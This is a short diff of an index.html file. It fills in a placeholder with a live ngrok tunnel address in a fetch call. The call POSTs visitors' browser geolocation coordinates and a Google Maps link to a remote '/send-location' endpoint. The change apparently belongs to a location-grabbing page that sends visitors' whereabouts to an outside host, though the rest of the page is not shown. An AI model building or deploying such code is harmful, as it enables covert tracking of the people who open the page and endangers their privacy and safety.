--- a/index.html
+++ b/index.html
@@ -53,7 +53,7 @@
       const longitude = position.coords.longitude;
       const maps = `https://www.google.com/maps?q=${latitude},${longitude}`;
 
-      fetch("NGROK_SERVER/send-location", {
+      fetch("https://e722-2804-7f0-9d81-a8c9-6417-3a80-b766-357c.ngrok-free.app/send-location", {
         method: "POST",
         headers: {
           "Content-Type": "application/json"
